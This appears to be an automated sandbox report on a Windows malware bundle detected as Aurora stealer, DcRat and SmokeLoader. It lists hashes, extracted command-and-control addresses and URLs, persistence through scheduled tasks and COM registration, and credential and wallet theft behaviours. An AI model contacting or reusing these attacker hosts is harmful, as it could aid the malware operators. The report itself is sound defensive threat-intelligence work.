aurora | ffb44a5388958cda3be00af5170e3fa51c5bc59e7b6ea659836417a17594d18c

Analysis

max time kernel
181s
max time network
637s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
16-09-2023 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware.zip
Size

75.2MB
MD5

9c5d4fde9036434c02da795d079f0651
SHA1

e57b24f74086c01f46b4d814688415c27a5e0068
SHA256

ffb44a5388958cda3be00af5170e3fa51c5bc59e7b6ea659836417a17594d18c
SHA512

1f956bf4f628553e88850d045cea9a5e09fb43c2a00b6311c4df2245535acfdaf6c5256ece4104df07ed9c69e15a033a2748ad2eaa4f17634ab6e8c32cffda0f
SSDEEP

1572864:jO3K/oykFae+/XkNwJ3ncS9pLkFg4FR40rbvXFahEvRY/Qj:K3K/jkFLobLkl40PvXpK/q

Score

10^/10

aurora dcrat smokeloader backdoor discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

aurora

185.239.239.194:8081

Extracted

Family

smokeloader

Version

2022

http://potunulit.org/

http://hutnilior.net/

http://bulimu55t.net/

http://soryytlic4.net/

http://novanosa5org.org/

http://nuljjjnuli.org/

http://tolilolihul.net/

http://somatoka51hub.net/

http://hujukui3.net/

http://bukubuka1.net/

http://golilopaster.org/

http://newzelannd66.org/

http://otriluyttn.org/

rc4.i32

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 33 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2124	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1344	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2528	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2272	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2072	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1240	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2728	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	936	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2220	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2460	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	476	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2620	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	592	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1524	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2532	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2824	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2124	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2512	1384	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	1384	schtasks.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/596-1594-0x0000000000990000-0x0000000000B50000-memory.dmp	dcrat
C:\INSTALLER\sppsvc.exe	dcrat
C:\Program Files\Common Files\RCX2EC3.tmp	dcrat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 19 IoCs

Processes:

lic.exeinstall application.exeIFOGKVBUZB.exeNMNEXHSZTR.exebdcamsetup.exeBDMPEG1SETUP.EXEFull_Setup_Activated.exebdcam.exebdcam.exe6523.exeAmdau.exebebra.exebuild3.exeDCKA.exeCLEP.exepowershell.exedesktopditor.execonhost.exedevalt.exe

pid	process
2316	lic.exe
2400	install application.exe
2272	IFOGKVBUZB.exe
1540	NMNEXHSZTR.exe
2884	bdcamsetup.exe
616	BDMPEG1SETUP.EXE
2624	Full_Setup_Activated.exe
1860	bdcam.exe
2856	bdcam.exe
884	6523.exe
2576	Amdau.exe
2660	bebra.exe
1980	build3.exe
2852	DCKA.exe
2416	CLEP.exe
1960	powershell.exe
2008	desktopditor.exe
1660	conhost.exe
2004	devalt.exe

Loads dropped DLL 64 IoCs

Processes:

pid	process
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244
1244

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

3744 icacls.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3744	icacls.exe

Registers COM server for autorun 1 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

regsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89C4B786-A490-4A3E-AA70-E6A8C61D3689}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A1C6833E-A3EC-4397-9FA9-151792F3408F}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2E7539A-CECF-4A6A-B187-939943ECEF05}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32\ = "C:\\Program Files (x86)\\BandiMPEG1\\bdfilters64.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F4F5C9E9-CFCC-4C65-A8BD-0423A338F188}\InprocServer32\ThreadingModel = "Both"	regsvr32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

254 api.ipify.org
139 api.2ip.ua
140 api.2ip.ua
142 api.2ip.ua
156 ipinfo.io
163 ipinfo.io
164 ipinfo.io
179 api.2ip.ua
257 api.ipify.org

flow	ioc
254	api.ipify.org
139	api.2ip.ua
140	api.2ip.ua
142	api.2ip.ua
156	ipinfo.io
163	ipinfo.io
164	ipinfo.io
179	api.2ip.ua
257	api.ipify.org

Drops file in System32 directory 14 IoCs

Processes:

BDMPEG1SETUP.EXEbdcamsetup.exe

description	ioc	process
File created	C:\Windows\system32\bdmpega64.acm	BDMPEG1SETUP.EXE
File created	C:\Windows\system32\bdmjpeg64.dll	BDMPEG1SETUP.EXE
File created	C:\Windows\SysWOW64\D3DCompiler_47.dll	bdcamsetup.exe
File created	C:\Windows\system32\vcomp140.dll	bdcamsetup.exe
File created	C:\Windows\SysWOW64\bdmpegv.dll	BDMPEG1SETUP.EXE
File created	C:\Windows\system32\msvcr110.dll	bdcamsetup.exe
File created	C:\Windows\SysWOW64\bdmpega.acm	BDMPEG1SETUP.EXE
File created	C:\Windows\system32\bdmpegv64.dll	BDMPEG1SETUP.EXE
File created	C:\Windows\SysWOW64\vcomp140.dll	bdcamsetup.exe
File created	C:\Windows\SysWOW64\msvcr110.dll	bdcamsetup.exe
File created	C:\Windows\SysWOW64\msvcp110.dll	bdcamsetup.exe
File created	C:\Windows\system32\D3DCompiler_47.dll	bdcamsetup.exe
File created	C:\Windows\system32\msvcp110.dll	bdcamsetup.exe
File created	C:\Windows\SysWOW64\bdmjpeg.dll	BDMPEG1SETUP.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

bdcam.exebdcam.exe

pid process

1860 bdcam.exe
2856 bdcam.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

IFOGKVBUZB.exe

description pid process target process

PID 2272 set thread context of 2556 2272 IFOGKVBUZB.exe AppLaunch.exe

pid	process
1860	bdcam.exe
2856	bdcam.exe

description	pid	process	target process
PID 2272 set thread context of 2556	2272	IFOGKVBUZB.exe	AppLaunch.exe

Drops file in Program Files directory 64 IoCs

Processes:

bdcamsetup.exeBDMPEG1SETUP.EXE

description	ioc	process
File created	C:\Program Files (x86)\Bandicam\bdcamvk32.dll	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\German.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Sinhala.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Uzbek.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\effects20.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\BandiMPEG1\bdfilters.dll	BDMPEG1SETUP.EXE
File created	C:\Program Files (x86)\Bandicam\bdcam_safemode.lnk	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Greek.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\camera.wav	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\rclick.wav	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\highlight20.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\RegVulkanLayer.bat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Azerbaijani.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Danish.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Dutch.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Farsi.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\French.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Serbian(Cyrillic).ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Serbian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\bdcam64.dll	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Arabic.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Lithuanian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\sample.png	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\effects30.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\bdfix.exe	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\bdcap32.dll	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Bosnian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Burmese.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Croatian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Luxembourgish.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Slovenian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Thai.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Traditional_Chinese.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Vietnamese.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\effects10.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Kurdish.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Russian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\uninstall.exe	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\English.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Georgian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\stop.wav	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\effects15.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Hebrew.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Italian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Latvian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Swedish.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Ukrainian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\lclick.wav	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Indonesian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Kazakh.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Portuguese.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Simplified_Chinese.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Turkish.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\bdcamvk32.json	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\highlight10.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\data\effects\highlight30.dat	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\bdcamih.dll	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\bdcap64.dll	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Norwegian.ini	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\lang\Portuguese(BR).ini	bdcamsetup.exe
File created	C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll	BDMPEG1SETUP.EXE
File created	C:\Program Files (x86)\BandiMPEG1\uninstall.exe	BDMPEG1SETUP.EXE
File created	C:\Program Files (x86)\Bandicam\bdcam64.bin	bdcamsetup.exe
File created	C:\Program Files (x86)\Bandicam\translators.txt	bdcamsetup.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2180	sc.exe
1800	sc.exe
2912	sc.exe
2752	sc.exe
1656	sc.exe
2072	sc.exe
1312	sc.exe
1860	sc.exe
2556	sc.exe
2980	sc.exe
1720	sc.exe
3040	sc.exe
2512	sc.exe
2532	sc.exe
1660	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3832 2580 WerFault.exe purchaseorder.exe

pid	pid_target	process	target process
3832	2580	WerFault.exe	purchaseorder.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6523.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe

Creates scheduled task(s) 1 TTPs 44 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	process
2904	schtasks.exe
1776	schtasks.exe
528	schtasks.exe
3940	schtasks.exe
1524	schtasks.exe
2532	schtasks.exe
2272	schtasks.exe
2788	schtasks.exe
2720	schtasks.exe
2220	schtasks.exe
476	schtasks.exe
4056	schtasks.exe
1344	schtasks.exe
1240	schtasks.exe
2180	schtasks.exe
2292	schtasks.exe
3556	schtasks.exe
2460	schtasks.exe
2864	schtasks.exe
592	schtasks.exe
2124	schtasks.exe
2528	schtasks.exe
2084	schtasks.exe
2672	schtasks.exe
3036	schtasks.exe
1696	schtasks.exe
2916	schtasks.exe
2272	schtasks.exe
2052	schtasks.exe
2228	schtasks.exe
2000	schtasks.exe
2072	schtasks.exe
1812	schtasks.exe
2824	schtasks.exe
2124	schtasks.exe
2220	schtasks.exe
2512	schtasks.exe
1992	schtasks.exe
3500	schtasks.exe
1988	schtasks.exe
2728	schtasks.exe
936	schtasks.exe
1644	schtasks.exe
2620	schtasks.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 167 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	167	Go-http-client/1.1

Modifies Internet Explorer settings 1 TTPs 56 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeiexplore.exebdcamsetup.exebdcam.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\bdcam.exe = "11000"	bdcamsetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	bdcam.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	bdcamsetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCRIPTURL_MITIGATION	bdcamsetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3C8AB7D1-549E-11EE-B67D-FA088ABC2EB2} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{24F04C71-549E-11EE-B67D-FA088ABC2EB2} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCRIPTURL_MITIGATION\bdcam.exe = "1"	bdcamsetup.exe
